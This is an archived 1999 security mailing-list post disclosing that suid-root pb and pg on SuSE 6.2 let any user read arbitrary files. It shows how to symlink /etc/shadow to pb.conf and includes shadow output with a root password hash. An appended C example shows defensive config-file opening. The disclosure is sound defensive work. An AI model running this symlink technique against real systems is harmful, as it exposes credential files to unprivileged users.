Two SuSE 6.2 local root exploits
Brock Tellier (btellier@WEBLEY.COM)
Thu, 16 Sep 1999 19:06:24 -0500
Greetings,
/usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow
any user to read any file on the system as shown:
susebox:/root # ls -la /usr/bin/pb
uname -rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb
susebox:/root # strace /usr/bin/pb
...
personality(PER_LINUX) = 0
getpid() = 16623
brk(0) = 0x805032c
brk(0x80504cc) = 0x80504cc
brk(0x8051000) = 0x8051000
open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or
directory)
write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such
file or directory
) = 41
_exit(1) = ?
susebox:/root #
---
xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf
xnec@susebox:/tmp > pb
Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> = <bin:*:8902:0:10000::::>
Unknown config line : <daemon:*:8902:0:10000::::> = <lp:*:9473:0:10000::::>
Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
... etc for the entire shadow file
The same scenario for /usr/bin/pg's pg.conf in your cwd. These two programs also contain numerous buffer overflows and other insecure file i/o and should obviously lose their suid bits. They cannot operate correctly without their s-bits unless they are run by root, but no one besides root will run them anyway. These programs are not worth patching.
Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
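
The strace output above shows the root cause: a set-uid root program opening "pb.conf" relative to the caller's working directory and following a symlink. As an added example (not part of the original post and not SuSE's code), this is how a privileged program can open its config defensively; the function name open_trusted_config and the path /etc/pb.conf are hypothetical.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE            /* exposes O_NOFOLLOW / O_CLOEXEC on glibc */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Open a config file for a privileged program. Returns an fd, or -1 with
 * errno set. trusted_owner is the uid allowed to own the file (0 for root). */
int open_trusted_config(const char *path, uid_t trusted_owner)
{
    struct stat st;
    int fd;

    if (path == NULL || path[0] != '/') {   /* never resolve against the cwd */
        errno = EINVAL;
        return -1;
    }
    /* O_NOFOLLOW refuses a symlink as the final path component (ELOOP);
     * parent directories must themselves be writable only by root. */
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    /* fstat() the descriptor, not the name, so the check cannot be raced. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != trusted_owner || (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

int main(void)
{
    /* Hypothetical fixed location; the original tools used "pb.conf" in cwd. */
    int fd = open_trusted_config("/etc/pb.conf", 0);
    if (fd < 0) {
        /* Report only the failure, never echo unparsed file contents. */
        fprintf(stderr, "config rejected (errno %d)\n", errno);
        return 1;
    }
    close(fd);
    return 0;
}
```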
This archive was generated by hypermail 2.0b3 on Fri Sep 17 1999 - 01:52:32 CDT